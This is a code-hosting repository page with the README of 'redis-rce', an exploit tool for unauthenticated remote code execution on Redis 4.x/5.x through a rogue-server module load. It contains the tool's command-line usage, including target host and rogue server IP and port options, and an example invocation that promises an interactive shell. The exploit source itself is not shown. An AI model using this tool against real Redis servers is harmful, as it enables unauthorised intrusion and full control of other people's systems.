# redis-rce **Repository Path**: keyboxdzd/redis-rce ## Basic Information - **Project Name**: redis-rce - **Description**: redis-rce未授权rce利用工具 - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-07-26 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # Redis RCE A exploit for Redis 4.x/5.x RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf). This repo is a modified version of . ## Usage: Compile exp.so from . ``` usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE] [-a AUTH] [-v] Redis 4.x/5.x RCE with RedisModules optional arguments: -h, --help show this help message and exit -r RHOST, --rhost RHOST target host -p RPORT, --rport RPORT target redis port, default 6379 -L LHOST, --lhost LHOST rogue server ip -P LPORT, --lport LPORT rogue server listen port, default 21000 -f FILE, --file FILE RedisModules to load, default exp.so -a AUTH, --auth AUTH redis password -v, --verbose show more info ``` ## example: ``` python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so ``` ![](https://blogpics-1251691280.file.myqcloud.com/imgs/20190708220258.png) The default target port is 6379 and the default vps port is 21000. And you will get an interactive shell!